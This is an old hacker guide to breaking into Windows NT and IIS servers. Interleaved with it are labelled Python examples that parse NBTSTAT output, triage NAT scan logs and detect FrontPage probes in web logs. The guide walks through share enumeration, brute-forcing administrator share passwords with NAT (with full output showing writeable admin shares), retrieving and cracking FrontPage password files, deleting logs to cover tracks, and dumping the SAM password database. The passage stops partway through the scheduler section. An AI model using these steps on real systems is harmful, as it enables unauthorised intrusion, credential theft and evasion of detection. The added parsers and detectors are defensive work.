Windows NT Deconstruction Tactics
Step by Step NT Exploitation Techniques

by vacuum of Rhino9 & Technotronic
vacuum@technotronic.com

This text is for educational use only. You will not find a point and click NT
hacking tool. This text was written to explain some of the malicious uses of
some of the utilities included within Windows NT. Finding system
vulnerabilities is becoming a lost art. Today's young hackers want a program
that will perform all of the tasks for them; while this is not necessarily a
bad thing, it does tend to suppress individual ideas which could lead to new
exploits.

Revision 4 03/16/98

I apologize for so many revisions in such a short time. This document is a
work in progress.

Changes in Revision 4:
  Included FrontPage information.
  NetBIOS information fully discussed.
  rdisk /s information.
  Made this .zip more like a unix rootkit by including all the mentioned tools.
  Cleaned up the overall layout.

I.   Initial Access Strategy
     1.) NetBIOS Shares Using Microsoft Executables
         a. NET.EXE's other uses
     2.) NAT, The NetBIOS Auditing Tool
II.  FrontPage Exploitation
     1.) FrontPage password decryption on unix servers with FrontPage extensions.
III. Registry Vulnerabilities
     1.) rdisk /s to dump the SAM (Security Account Manager)
     2.) Gaining access to the registry with the AT.EXE command (local)
     3.) REGEDT32.EXE and REGEDIT.EXE
     4.) REGINI.EXE and REGDMP.EXE remote registry editing tools
     5.) Using the Registry to Execute Malicious Code
IV.  Trojan .lnk (shortcuts)
     1.) Security hole within winnt\profiles and login scripts
V.   Workarounds for common system policy restrictions
VI.  PWDUMP Example

Included Files:
  NTExploits.txt  this document
  samproof.txt    example of the sam hive from the registry
  notepad.reg     Example .reg file that starts up notepad.exe upon login.
                  Could be any executable.
  service.pwd     FrontPage password example.
NetBIOS Shares Using the standard Microsoft Executables

C:\>NBTSTAT -A 123.123.123.123
C:\>NBTSTAT -a www.target.com

       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
STUDENT1       <20>  UNIQUE      Registered
STUDENT1       <00>  UNIQUE      Registered
DOMAIN1        <00>  GROUP       Registered
DOMAIN1        <1C>  GROUP       Registered
DOMAIN1        <1B>  UNIQUE      Registered
STUDENT1       <03>  UNIQUE      Registered
DOMAIN1        <1E>  GROUP       Registered
DOMAIN1        <1D>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered

MAC Address = 00-C0-4F-C4-8C-9D

After a NetBIOS share is found, it can be added to the LMHOSTS file.

Computername <03> UNIQUE is registered by the messenger service. This is the
computername to be added to the LMHOSTS file, which is not necessary to use
NAT.EXE but is necessary if you would like to view the remote computer in
Network Neighborhood.

Example of LMHOSTS file:

123.123.123.123 student1
24.3.9.12       target2

Now you can use the Find Computer option within NT or 95 to browse the shares.

An alternative option would be to use the very powerful NET.EXE

C:\>net view 123.123.123.123
C:\>net view \\student1

Shared resources at 123.123.123.123

Share name   Type   Used as   Comment
------------------------------------------------------------------------------
NETLOGON     Disk             Logon server share
Test         Disk
The command completed successfully.

NOTE: The C$, ADMIN$ and IPC$ shares are hidden and are not shown.

C:\>net use x: \\123.123.123.123\test
The command completed successfully.

Now the command prompt or the NT Explorer can be used to access the remote
drive X:

C:\>net use
New connections will be remembered.

Status   Local   Remote                    Network
-------------------------------------------------------------------------------
OK       X:      \\123.123.123.123\test    Microsoft Windows Network
OK               \\123.123.123.123\test    Microsoft Windows Network
The command completed successfully.

Here are some other interesting things that NET.EXE can be used for that are
not related to NetBIOS.
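The name table above is worth decoding rather than eyeballing: each <XX> suffix tells you which service registered the name, so a defender sweeping their own segment can tell from one NBTSTAT -A which boxes offer SMB shares (<20>), which are domain controllers (<1C>) and who is logged on (<03>). The following is an added example, not code from the original text; it parses the sample table shown above (typed in here as constructed input) using the standard NetBIOS suffix assignments.

```python
# Added example (not part of the original text): decode an NBTSTAT -A name
# table into the services a host advertises.  SAMPLE_NBTSTAT is the table
# shown in the text, reproduced here as constructed input; SUFFIX_MEANING
# holds the standard NetBIOS suffix assignments.
import re

SAMPLE_NBTSTAT = """\
       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
STUDENT1       <20>  UNIQUE      Registered
STUDENT1       <00>  UNIQUE      Registered
DOMAIN1        <00>  GROUP       Registered
DOMAIN1        <1C>  GROUP       Registered
DOMAIN1        <1B>  UNIQUE      Registered
STUDENT1       <03>  UNIQUE      Registered
DOMAIN1        <1E>  GROUP       Registered
DOMAIN1        <1D>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered

MAC Address = 00-C0-4F-C4-8C-9D
"""

# (suffix, type) -> what registering that name means.
SUFFIX_MEANING = {
    ("00", "UNIQUE"): "Workstation Service (computer name)",
    ("00", "GROUP"): "domain or workgroup name",
    ("03", "UNIQUE"): "Messenger Service (computer name or logged-on user)",
    ("20", "UNIQUE"): "File Server Service (SMB shares offered)",
    ("1B", "UNIQUE"): "Domain Master Browser (PDC)",
    ("1C", "GROUP"): "Domain Controllers",
    ("1D", "UNIQUE"): "Master Browser",
    ("1E", "GROUP"): "Browser Service Elections",
    ("01", "GROUP"): "__MSBROWSE__ master browser announcement",
}

ROW_RE = re.compile(r"^(?P<name>\S+?)\s*<(?P<suffix>[0-9A-F]{2})>\s+"
                    r"(?P<type>UNIQUE|GROUP)\s+(?P<status>\w+)")
MAC_RE = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")


def parse_nbtstat(text):
    """Return (rows, mac): one dict per name-table row plus the MAC address."""
    rows, mac = [], None
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            row = m.groupdict()
            row["meaning"] = SUFFIX_MEANING.get(
                (row["suffix"], row["type"]), "unassigned/unknown suffix")
            rows.append(row)
            continue
        m = MAC_RE.search(line)
        if m:
            mac = m.group(1)
    return rows, mac


def summarize_host(text):
    """Reduce a name table to the facts that matter when auditing a host:
    computer name, domain, whether it serves SMB shares (<20>), whether it is
    a domain controller (<1C>), any logged-on user (a <03> name that differs
    from the computer name), and the MAC."""
    rows, mac = parse_nbtstat(text)
    info = {"computer": None, "domain": None, "offers_shares": False,
            "domain_controller": False, "logged_on_user": None, "mac": mac}
    messenger = []
    for row in rows:
        key = (row["suffix"], row["type"])
        if key == ("00", "UNIQUE"):
            info["computer"] = row["name"]
        elif key == ("00", "GROUP"):
            info["domain"] = row["name"]
        elif key == ("20", "UNIQUE"):
            info["offers_shares"] = True
        elif key == ("1C", "GROUP"):
            info["domain_controller"] = True
        elif key == ("03", "UNIQUE"):
            messenger.append(row["name"])
    users = [n for n in messenger if n != info["computer"]]
    if users:
        info["logged_on_user"] = users[0]
    return info


if __name__ == "__main__":
    for row in parse_nbtstat(SAMPLE_NBTSTAT)[0]:
        print(f'{row["name"]:<16} <{row["suffix"]}> {row["type"]:<7} {row["meaning"]}')
    print(summarize_host(SAMPLE_NBTSTAT))
```

For the sample table this reports STUDENT1 in DOMAIN1 as a domain controller that offers shares, with no separate logged-on user because the only <03> name is the computer name itself.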
NET localgroup  will show which groups have been created on the local machine.
NET name        will show you the name of the computer as well as who is
                logged in.
NET accounts    will show the password restrictions for the user.
NET share       displays the shares for the local machine including the $
                shares which are supposed to be hidden heheh??
NET user        will show you which accounts are created on the local machine.
                This can be useful when adding user names to NAT, The NetBIOS
                Auditing Tool, to brute force the shares shown using NET share.
NET start SERVICE.  For example, net start schedule
                This will start the schedule service which can be used to
                access the complete registry on a local machine.

NAT (NetBIOS Auditing Tool)

This technique works with the default share type, Everyone/Full Control. If
you are denied access, permissions have been applied to the share, and a
password will be required.

NAT.EXE (NetBIOS Auditing Tool)

NAT.EXE [-o filename] [-u userlist] [-p passlist]
OPTIONS
    -o  Specify the output file. All results from the scan will be written to
        the specified file, in addition to standard output.
    -u  Specify the file to read usernames from. Usernames will be read from
        the specified file when attempting to guess the password on the remote
        server. Usernames should appear one per line in the specified file.
    -p  Specify the file to read passwords from. Passwords will be read from
        the specified file when attempting to guess the password on the remote
        server. Passwords should appear one per line in the specified file.
Addresses should be specified in comma delimited format, with no spaces. Valid
address specifications include:

    hostname              - "hostname" is added
    127.0.0.1-127.0.0.3   - adds addresses 127.0.0.1 through 127.0.0.3
    127.0.0.1-3           - adds addresses 127.0.0.1 through 127.0.0.3
    127.0.0.1-3,7,10-20   - adds addresses 127.0.0.1 through 127.0.0.3,
                            127.0.0.7, 127.0.0.10 through 127.0.0.20.
    hostname,127.0.0.1-3  - adds "hostname" and 127.0.0.1 through 127.0.0.1

All combinations of hostnames and address ranges as specified above are valid.

NAT.EXE does all of the above techniques, plus it will try Administrative
shares ($), scan a range of IP addresses and use a dictionary file to crack
the NetBIOS passwords. NAT.EXE is the tool preferred by most hackers.

C:\>nat -o vacuum.txt -u userlist.txt -p passlist.txt 204.73.131.10-204.73.131.30

[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt
[*]--- Checking host: 204.73.131.11
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Obtained server information:
Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]
[*]--- Obtained listing of shares:
        Sharename    Type     Comment
        ---------    ----     -------
        ADMIN$       Disk:    Remote Admin
        C$           Disk:    Default share
        IPC$         IPC:     Remote IPC
        NETLOGON     Disk:    Logon server share
        Test         Disk:
[*]--- This machine has a browse list:
        Server       Comment
        ---------    -------
        STUDENT1
[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access

If the default share is Everyone/Full Control, done, it is hacked.

FrontPage Exploitation:

Most FrontPage exploits compromise only the wwwroot directory and can be used
to change the html of a site, which has become a popular method of gaining
fame in the hacker community.
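Stepping back to the NAT run above before going on to FrontPage: NAT is, as its name says, an auditing tool, and when you point it at your own segment the chatty log above is what you have to read. The following is an added example, not code from the original text or from NAT itself; it turns a constructed excerpt of that log into per-host findings (which account got in, which shares were readable, which were writeable) and ranks them, recording that a password was guessed from the list without copying the password itself into the report.

```python
# Added example (not part of the original text, not NAT's own code): triage a
# NAT log into findings.  SAMPLE_NAT is a constructed excerpt of the output
# shown in the text, with a second host added that could not be reached.
import re

SAMPLE_NAT = r"""
[*]--- Checking host: 204.73.131.11
[*]--- Obtaining list of remote NetBIOS names
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
[*]--- Checking host: 204.73.131.12
[*]--- Obtaining list of remote NetBIOS names
[*]--- Unable to connect
"""

HOST_RE = re.compile(r"Checking host: (\S+)")
CRED_RE = re.compile(r"CONNECTED: Username: `([^']*)' Password: `([^']*)'")
ACCESS_RE = re.compile(r"WARNING: Able to access share: (\S+)")
WRITE_RE = re.compile(r"WARNING: Directory is writeable: (\S+)")


def share_name(unc):
    # \\*SMBSERVER\ADMIN$ -> ADMIN$
    return unc.rsplit("\\", 1)[-1]


def triage_nat(text):
    """Per host: the account NAT got in as (the password itself is deliberately
    not recorded), the shares that were readable, and the ones writeable."""
    findings, host = {}, None
    for line in text.splitlines():
        m = HOST_RE.search(line)
        if m:
            host = m.group(1)
            findings[host] = {"guessed_account": None, "accessible": [], "writeable": []}
            continue
        if host is None:
            continue
        m = CRED_RE.search(line)
        if m:
            findings[host]["guessed_account"] = m.group(1)
            continue
        m = ACCESS_RE.search(line)
        if m:
            findings[host]["accessible"].append(share_name(m.group(1)))
            continue
        m = WRITE_RE.search(line)
        if m:
            findings[host]["writeable"].append(share_name(m.group(1)))
    return findings


def severity(result):
    """CRITICAL: an administrative ($) share is writeable.  HIGH: any share is
    writeable or a password was guessed from the list.  MEDIUM: shares were
    readable.  LOW: nothing got through."""
    if any(s.endswith("$") for s in result["writeable"]):
        return "CRITICAL"
    if result["writeable"] or result["guessed_account"]:
        return "HIGH"
    if result["accessible"]:
        return "MEDIUM"
    return "LOW"


def report(text):
    """host -> severity for the whole run."""
    return {h: severity(r) for h, r in triage_nat(text).items()}


if __name__ == "__main__":
    for host, res in triage_nat(SAMPLE_NAT).items():
        print(host, severity(res), res)
```

A writeable ADMIN$ reached with a dictionary password on ADMINISTRATOR is what makes the first host CRITICAL; the second host, which never answered, comes out LOW.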
The following is a list of the Internet Information Server file locations in
relation to the local hard drive (C:) and the web (www.target.com):

C:\InetPub\wwwroot
C:\InetPub\scripts                                      /Scripts
C:\InetPub\wwwroot\_vti_bin                             /_vti_bin
C:\InetPub\wwwroot\_vti_bin\_vti_adm                    /_vti_bin/_vti_adm
C:\InetPub\wwwroot\_vti_bin\_vti_aut                    /_vti_bin/_vti_aut
C:\InetPub\cgi-bin                                      /cgi-bin
C:\InetPub\wwwroot\srchadm                              /srchadm
C:\WINNT\System32\inetserv\iisadmin                     /iisadmin
C:\InetPub\wwwroot\_vti_pvt
C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM          Internet Information Index Server sample
C:\Program Files\Microsoft FrontPage\_vti_bin
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm
C:\WINNT\System32\inetserv\iisadmin\htmldocs\admin.htm  /iisadmin/isadmin

Using FrontPage, a hacker may alter the html of a remote website; often
FrontPage webs are left un-passworded.

  On the FrontPage Explorer's File menu, choose Open FrontPage Web.
  In the Getting Started dialog box, select Open an Existing FrontPage Web and
  choose the FrontPage web you want to open. Click More Webs if the web you
  want to open is not listed.
  Click OK.
  If you are prompted for your author name and password, you will have to
  decrypt service.pwd, guess, or move on. Enter them in the Name and Password
  Required dialog box, and click OK.
  Alter the existing page, or upload a page of your own.

Scanning PORT 80 (http) or 443 (https) options:

GET /_vti_inf.html          #Ensures that FrontPage server extensions are installed.
GET /_vti_pvt/service.pwd   #Contains the encrypted password files. Not used on IIS and WebSite servers
GET /_vti_pvt/authors.pwd   #On Netscape servers only. Encrypted names and passwords of authors.
GET /_vti_pvt/administrators.pwd
GET /_vti_log/author.log    #If author.log is there it will need to be cleaned to cover your tracks
GET /samples/search/queryhit.htm

Other ways of obtaining service.pwd:

http://ftpsearch.com/index.html          search for service.pwd
http://www.alstavista.digital.com        advanced search for link:"/_vti_pvt/service.pwd"

Attempt to connect to the server using FTP.
port 21   login anonymous   password guest@unknown

The anonymous login will use the internally created IISUSR_computername
account to assign NT permissions. An incorrect configuration may leave areas
vulnerable to attack.

If service.pwd is obtained it will look similar to this:

Vacuum:SGXJVl6OJ9zkE

The above password is apple

Turn it into DES format:

Vacuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/bash

Then run your favorite unix password cracker like john.exe (John The Ripper)
against a large dictionary file, or ntucrack.exe which will brute force crack
the password.

Registry Vulnerabilities:

RDISK

rdisk /s will dump the security and sam portions of the registry into the
c:\winnt\repair directory. It will also give you the option of creating an
emergency repair diskette. This .zip includes SAMDUMP.EXE which can be used to
extract passwords from emergency repair diskettes. Within that directory there
will be a sam._ file. It is ethically used for the emergency repair disk. If
you have gained access to the local drive through physical access or through
netbios shares, run rdisk /s. There is a utility called SAMDUMP included
within this .zip that will extract the passwords.

GAINING ACCESS TO THE ENTIRE REGISTRY (Local)

For this to work, you will need to start the schedule service. By default,
this service is set to Manual.

Click Start/Settings/Control Panel/Services/
Then highlight Schedule
Click Start    (To start the service immediately. This will only be done once)
Click Startup  (To change the service to automatic, to be started each time)

NOTES about AT.EXE usage:

AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
AT [\\computername] time [/INTERACTIVE] [ /EVERY:date[,...] | /NEXT:date[,...]] "command"

\\computername    Specifies a remote computer. Commands are scheduled on the
                  local computer if this parameter is omitted.
id                Is an identification number assigned to a scheduled command.
/delete           Cancels a scheduled command. If id is omitted, all the
                  scheduled commands on the computer are canceled.
/yes              Used with cancel all jobs command when no further
                  confirmation is desired.
time              Specifies the time when command is to run.
/interactive      Allows the job to interact with the desktop of the user who
                  is logged on at the time the job runs.
/every:date[,...] Runs the command on each specified day(s) of the week or
                  month. If date is omitted, the current day of the month is
                  assumed.
/next:date[,...]  Runs the specified command on the next occurrence of the day
                  (for example, next Thursday). If date is omitted, the
                  current day of the month is assumed.
"command"         Is the Windows NT command, or batch program to be run.

From a Command Prompt type: at
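Looking back at the FrontPage section: the GET probes listed there are exactly what a web server's access log records when someone checks a site for FrontPage extensions and tries to fetch the .pwd files, so the same list doubles as a detection signature for the server's owner. The following is an added example, not code from the original text; it flags those paths in Common Log Format lines (the log lines are constructed) and reports, per client, how many probe paths were requested and whether a .pwd file was actually served with a 200.

```python
# Added example (not part of the original text): flag FrontPage probe paths
# in an access log.  SAMPLE_LOG is constructed; PROBE_PATHS are the paths the
# text lists under "Scanning PORT 80 (http) or 443 (https) options".
import re

SAMPLE_LOG = """\
10.0.0.5 - - [16/Mar/1998:21:03:11 -0600] "GET /index.html HTTP/1.0" 200 4521
10.0.0.9 - - [16/Mar/1998:21:04:02 -0600] "GET /_vti_inf.html HTTP/1.0" 200 1754
10.0.0.9 - - [16/Mar/1998:21:04:03 -0600] "GET /_vti_pvt/service.pwd HTTP/1.0" 200 38
10.0.0.9 - - [16/Mar/1998:21:04:04 -0600] "GET /_vti_pvt/authors.pwd HTTP/1.0" 404 211
10.0.0.9 - - [16/Mar/1998:21:04:05 -0600] "GET /_vti_log/author.log HTTP/1.0" 403 198
10.0.0.7 - - [16/Mar/1998:21:05:40 -0600] "GET /samples/search/queryhit.htm HTTP/1.0" 200 902
"""

# Paths from the text, with what each one tells the requester.
PROBE_PATHS = {
    "/_vti_inf.html": "FrontPage extensions present",
    "/_vti_pvt/service.pwd": "encrypted author passwords",
    "/_vti_pvt/authors.pwd": "encrypted author names and passwords",
    "/_vti_pvt/administrators.pwd": "encrypted administrator passwords",
    "/_vti_log/author.log": "authoring log",
    "/samples/search/queryhit.htm": "Index Server sample page",
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+')


def parse_line(line):
    """One CLF line -> dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # Normalise: drop any query string and lower-case the path, since IIS on
    # an NT file system serves /_VTI_PVT/SERVICE.PWD and the lower-case name
    # as the same file.
    rec["path"] = rec["path"].split("?", 1)[0].lower()
    return rec


def find_probes(text):
    """Return the parsed requests that hit a FrontPage probe path."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec and rec["path"] in PROBE_PATHS:
            rec["what"] = PROBE_PATHS[rec["path"]]
            hits.append(rec)
    return hits


def by_client(hits):
    """Per client IP: how many probe paths it requested and which .pwd files
    the server actually handed over (status 200)."""
    out = {}
    for h in hits:
        c = out.setdefault(h["ip"], {"probes": 0, "served_pwd": []})
        c["probes"] += 1
        if h["status"] == 200 and h["path"].endswith(".pwd"):
            c["served_pwd"].append(h["path"])
    return out


if __name__ == "__main__":
    for ip, c in by_client(find_probes(SAMPLE_LOG)).items():
        print(ip, c)
```

On the sample, 10.0.0.9 walks the _vti_ paths in order one second apart and is handed service.pwd with a 200, which is the finding to act on; a single hit on the Index Server sample page from 10.0.0.7 is noise by comparison, and 10.0.0.5 never appears.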